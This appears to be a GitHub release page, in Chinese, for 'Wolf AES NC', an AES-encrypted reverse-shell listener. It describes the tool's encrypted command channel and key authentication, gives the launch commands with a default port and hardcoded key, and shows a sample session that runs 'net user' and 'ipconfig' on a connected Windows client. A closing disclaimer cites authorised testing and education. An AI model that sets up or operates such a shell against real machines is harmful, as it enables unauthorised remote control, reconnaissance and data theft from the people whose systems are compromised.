Skip to content

Wolf NC AES Shell 1.0

Choose a tag to compare

@0x7556 0x7556 released this 02 Jun 15:50
· 3 commits to main since this release
9cea3b6

Wolf AES NC - 加密反弹Shell文档

Wolf AES NC 是一个基于AES加密的反弹Shell工具,采用WolfHash通信密钥认证机制,支持自定义端口和密码。


功能特性

  • AES-256加密通信:所有数据传输均使用AES加密
  • WolfHash密钥认证:基于WolfHash的双向身份验证
  • 灵活配置:支持自定义监听端口和通信密钥
  • 持久监听:服务端支持多客户端连接,自动清理断开连接
  • 命令交互:实时执行远程命令并返回结果

使用方法

基础启动

wolfnc.exe
  • 监听端口:7556(默认)
  • 通信密钥:ca63457538b9b1e0(默认)

自定义端口

wolfnc.exe 8888
  • 监听端口:8888
  • 通信密钥:ca63457538b9b1e0(默认)

自定义端口与密钥

wolfnc.exe 8888 ca63457538b9b342
  • 监听端口:8888
  • 通信密钥:ca63457538b9b342

工作流程

阶段 描述
服务端初始化 在指定端口(默认7556)启动监听
客户端连接 客户端连接后,显示连接信息(IP:端口)
命令交互 CMD >提示符后输入命令,实时执行并返回结果
会话终止 输入exit或客户端断开连接后,进行清理操作
恢复监听 自动返回监听状态,等待下一个客户端连接

连接示例

>wolfnc.exe 8888 ca63457538b9b342
WolfShell AES NC 1.0
Listening on port: 8888
Client connected: 192.168.50.31:65181

CMD > net user
\\WIN7 的用户帐户
[返回用户列表结果]

CMD > ipconfig
[返回网络配置结果]

CMD > exit
Connection closed.
Listening on port: 8888

密钥管理

安全建议

  • 定期更换通信密钥,避免使用默认密钥
  • 在生产环境中使用强随机密钥
  • 密钥仅在授权用户之间传递

故障排除

问题 原因 解决方案
端口被占用 指定端口已被其他进程使用 更换端口:wolfnc.exe [新端口]
连接失败 密钥不匹配 确认客户端和服务端密钥一致
命令无响应 网络连接中断 检查网络连接,重新连接

免责声明

  • 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。